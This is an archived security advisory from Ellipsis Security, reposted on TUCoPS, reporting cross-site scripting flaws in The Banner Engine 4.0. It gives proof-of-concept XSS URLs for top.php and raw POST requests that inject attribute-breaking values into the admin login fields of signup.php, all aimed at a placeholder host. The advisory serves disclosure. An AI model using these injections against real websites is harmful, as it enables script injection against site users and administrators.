TUCoPS :: HP Unsorted T :: b06-3435.htm

Tbe 4.0 xss
TBE 4.0 XSS
TBE 4.0 XSS


The Banner Engine - tbe4.0
Native Solutions
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/top.php?action=search&catid=catid&text=%3Cscript%3Ealert(%22Ellipsis+Security+Test%22)%3C/script%3E
http://target.xx/top.php?action=search&catid=catid&text=%3Cimg%20src=%22javascript:alert('Ellipsis+Security+Test');%22%3E
---
POST http://target.xx:80/signup.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 127
adminpass=">&adminlogin=1&action=1&login=1&password=1&bid=1&bnumr=1
---
POST http://target.xx:80/signup.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 127
adminpass=1&adminlogin=">&action=1&login=1&password=1&bid=1&bnumr=1
-----------------
Ellipsis Security
http://ellsec.org

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH